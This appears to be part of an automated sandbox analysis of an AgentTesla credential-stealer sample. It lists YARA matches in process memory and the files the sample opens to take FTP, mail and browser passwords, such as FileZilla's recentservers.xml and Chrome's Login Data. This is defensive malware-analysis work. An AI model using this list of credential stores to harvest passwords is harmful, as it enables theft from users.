Source: Yara match	File source: 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.507386874.000000000345F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.483487835.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.506532288.0000000003169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.413796340.0000000003439000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 2820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2924, type: MEMORYSTR

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 2820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2924, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 11.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.35699f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.34099f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.330fd40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.35699f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.3588720.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.346fd40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.34099f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.35dfd40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.3418720.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.32b8720.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.507386874.000000000345F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.483487835.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.506532288.0000000003169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.413796340.0000000003439000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 2820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2924, type: MEMORYSTR